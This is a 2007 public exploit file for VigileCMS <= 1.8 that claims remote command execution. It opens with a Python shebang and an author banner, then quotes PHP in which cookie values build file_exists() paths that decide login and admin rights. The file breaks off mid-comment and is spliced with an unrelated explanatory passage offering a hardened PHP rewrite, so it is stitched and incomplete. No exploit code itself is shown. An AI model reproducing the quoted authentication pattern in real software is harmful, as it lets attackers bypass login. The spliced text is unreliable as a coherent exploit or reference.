VigileCMS <= 1.8 Stealth

#!/usr/bin/python
#-*- coding: iso-8859-15 -*-
'''
------------------------------------------------------------------------------------------------
 ____            __________         __             ____  __   
/_   | ____     |__\_____  \  _____/  |_          /_   |/  |_ 
 |   |/    \    |  | _(__  <_/ ___\   __\  ______  |   \   __\
 |   |   |  \   |  |/       \  \___|  |   /_____/  |   ||  |  
 |___|___|  /\__|  /______  /\___  >__|            |___||__|  
          \/\______|      \/     \/                         

------------------------------------------------------------------------------------------------
This is a Public Exploit. 22/11/2007 (dd-mm-yyyy)
------------------------------------------------------------------------------------------------
§ 0day VigileCMS <= 1.8 Stealth - Remote Command Execution §
Vendor:	 http://www.vigilenapoletano.it
Severity: Highest
Author:	  The:Paradox
Italy r0x.

Visit inj3ct-it.org

Comments: This exploit was coded to show some people what a real vulnerability is.
------------------------------------------------------------------------------------------------
Related Codes:

--- index.php; line 64:

// rem_user and rem_pass come straight from the client and are concatenated,
// unvalidated, into a filesystem path; file_exists() on that path is the only check.
if (isset($_COOKIE[rem_user]) and isset ($_COOKIE[rem_pass]) and !isset($_SESSION[user])) {
    if(file_exists(USERS_TAB."/$_COOKIE[rem_user].$_COOKIE[rem_pass].php")){
        $_SESSION[user] = $_COOKIE[rem_user];
        $_SESSION[pass] = $_COOKIE[rem_pass];
        logthis("$_SESSION[user] si è collegato al Sito: riconosciuto con Cookie!");
        UserVisita ();// update the user's visit counter in the database
    }
}

--- func.inc.php; line 93:

// Same pattern: the session values set above are used to build the ADMIN_TAB path.
function is_admin(){ 	//## FUNCTION ##
    if( (isset($_SESSION[user]) and isset($_SESSION[pass])) && (file_exists(ADMIN_TAB."/$_SESSION[user].$_SESSION[pass].php")) ){
	return true;
    } else {
        return false;
    }
}

--- func.inc.php; line 109:

function is_superadmin(){ 	//## FUNCTION ##
    include (LOGS_TAB."/creazione.php");
    if (isset($_SESSION["user"]) and isset($_SESSION["pass"]) and ($_SESSION[user]==$primo_amministra)) {
	return true;
    } else {
        return false;
    }
}

--- vedipm.php; line 210:

            if ($_POST[ttl] =="") $_POST[ttl]="Nessun oggetto";

            $_POST[ttl] =stripslashes($_POST[ttl]);

            $_POST[ttl] =htmlspecialchars($_POST[ttl]); // prevents html characters from being displayed and
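What the index.php and is_admin() excerpts have in common is that a client-supplied name is pasted into a filesystem path and file_exists() on that path is treated as proof of identity. As an added example (not VigileCMS code), here is the index.php cookie login rewritten so the cookie values are whitelisted before they can touch a path and the resolved file is confirmed to live under the users directory; USERS_TAB is the constant from the listing, while the helper names, the character whitelist and the PHP 7.1+ syntax are assumptions of this example.

```php
<?php
// Added example, not part of VigileCMS: hardened form of the index.php block.
// Assumes USERS_TAB is defined by the CMS, as in the original listing.

function vigile_safe_user_file(string $base, string $user, string $pass): ?string
{
    // Strict whitelist: any ".", "/", "\\", NUL or other path metacharacter is
    // rejected before the value is ever concatenated into a path.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $user)
        || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $pass)) {
        return null;
    }
    $path = $base . '/' . $user . '.' . $pass . '.php';

    // Defence in depth: even with the whitelist, require the resolved path to
    // sit inside the resolved base directory (realpath() is false if absent).
    $real     = realpath($path);
    $realBase = realpath($base);
    if ($real === false || $realBase === false
        || strpos($real, $realBase . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Replacement for the cookie auto-login; returns true only when a session was set.
function vigile_cookie_login(array $cookie, array &$session): bool
{
    if (isset($session['user']) || !isset($cookie['rem_user'], $cookie['rem_pass'])) {
        return false;
    }
    $file = vigile_safe_user_file(USERS_TAB, $cookie['rem_user'], $cookie['rem_pass']);
    if ($file === null) {
        return false; // malformed or out-of-tree name: nothing from the cookie is trusted
    }
    $session['user'] = $cookie['rem_user'];
    $session['pass'] = $cookie['rem_pass'];
    return true;
}
```

The same whitelist belongs in is_admin() before $_SESSION[user] and $_SESSION[pass] are used to build the ADMIN_TAB path, since those values originate from the same cookies.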
